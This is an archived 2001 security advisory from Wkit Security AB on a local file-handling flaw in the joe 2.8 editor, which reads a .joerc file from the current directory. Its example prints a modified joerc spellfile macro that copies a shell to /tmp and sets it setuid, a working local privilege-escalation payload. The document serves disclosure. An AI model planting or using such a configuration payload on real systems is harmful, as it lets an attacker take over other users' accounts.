OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: advisoriesWKIT.COM
Date: Wed Feb 28 2001 - 08:13:42 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    WKIT SECURITY AB
     www.wkit.com

    TITLE: Joe's Own Editor File Handling Error
    ADVISORY ID: WSIR-01/02-02
    REFERENCE: http://www.wkit.com/advisories
    CVE: GENERIC-MAP-NOMATCH
    CREDIT: Christer Öberg, Wkit Security AB
    CONTACT: advisorieswkit.com
    CLASS: File Handling Error
    OBJECT: joe(1) (exec)
    VENDOR: Josef H. Allen
    STATUS:
    REMOTE: No
    LOCAL: Yes
    VULNERABLE: Joseph Allen joe 2.8

    DATE
      CREATED: 26/02/2001
      LAST UPDATED:
      VENDOR CONTACT:
      RELEASE: 28/02/2001

    VULNERABILITY DESCRIPTION
      joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and
      /usr/local/lib/joerc in that order. Users could be tricked into execute
      commands if they open/edit a file with joe in a directory where other
      users can write.

    CONDITIONS
      User using joe in a world/group writable directory.

    EXAMPLE
      A user copy the default joerc file to a world writable directory and
    change
      :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty
    >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype
      to
      :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty
    >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod
      4755 /tmp/suid",rtn,retype
      Another user opens a file in that directory with joe and run ispell with
      ^[l the result is a suid shell in /tmp

    SOLUTION/VENDOR INFORMATION/WORKAROUND

    DISCLAIMER
      The contents of this advisory may be distributed freely, provided that
      no fee is charged and proper credit is given. Wkit Security AB takes
      no credit for this discovery if someone else has published this
      information in the public domain before this advisory was released.
      The information herein is intended for educational purposes, not for
      malicious use. Wkit Security AB takes no responsibility whatsoever for
    the
      use of this information.

    ABOUT
      Wkit Security AB is an independent data security company working with
      security-related services and products.

      Wkit Security AB
      Upperudsv. 4
      S-464 72 Håverud
      SWEDEN
      http://www.wkit.com
      e-mail: advisorieswkit.com

    (C) 2001 WKIT SECURITY AB